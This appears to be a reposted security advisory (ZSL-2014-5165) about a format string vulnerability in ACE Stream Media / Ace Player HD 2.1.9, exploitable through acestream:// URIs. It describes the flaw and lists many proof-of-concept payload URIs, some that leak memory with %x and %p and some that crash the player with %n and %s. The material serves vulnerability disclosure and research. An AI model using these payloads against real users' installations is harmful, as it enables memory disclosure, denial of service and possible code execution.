ACE Stream Media 2.1 (acestream://) Format String Exploit PoC

2014.01.03
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

ACE Stream Media 2.1 (acestream://) Format String Exploit PoC Vendor: ACE Stream Product web page: http://www.acestream.org Affected version: Ace Player HD 2.1.9 (VLC 2.0.5) Summary: Ace Stream is an innovative multimedia platform of a new generation, which includes different products and solutions for ordinary Internet users as well as for professional members of the multimedia market. Ace Stream uses in its core, P2P (peer-to-peer) technology, BitTorrent protocol, which is acknowledged as the most effective protocol to transfer/deliver 'heavy content'. Desc: ACE Stream Media (Ace Player HD) is prone to a remote format string vulnerability because the application fails to properly sanitize user-supplied input thru the URI using the 'acestream://' protocol before including it in the format-specifier argument of a formatted-printing function. A remote attacker may exploit this issue to execute arbitrary code with the privileges of the user running the affected application and/or cause memory address disclosure. Failed exploit attempts may cause denial-of-service (DoS) conditions. Tested on: Microsoft Windows 7 Professional SP1 (EN) 64bit Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5165 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php 30.12.2013 -- format md: acestream://AAAA%08x.%08x.%08x.%08x.%08x.AAAA acestream://AAAA%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08p.%08pAAAAA acestream://AAAA%s acestream://AAAA%s.AAAA%08x.%08x.%08x.%08x.AAAA acestream://AAAA%08d acestream://%i%i%i%i acestream://%c%c%c%c acestream://%f%f%f%f acestream://AAAA%.8x.%.8p.%.8i.%.8d.%.8f.%.8s.%n.%08x.%08x.%08x.%08x.%08x.%08xAAAA acestream://%15.10s.%15.10s acestream://%8x%8x%8x%8x%8x%8x%8x%8x%8x acestream://%0a%0d acestream://%AA acestream://%p%p%p%p%s crashes: acestream://AAAA%08s acestream://AAAA%n acestream://%08s acestream://%p%p%p%p%s%n acestream://%n acestream://%s%s%s%s acestream://AAAA%15.10s.%15.10s.%15.10s.%15.10s.%15.10s.%15.10sAAAA

References:

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5165.php


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top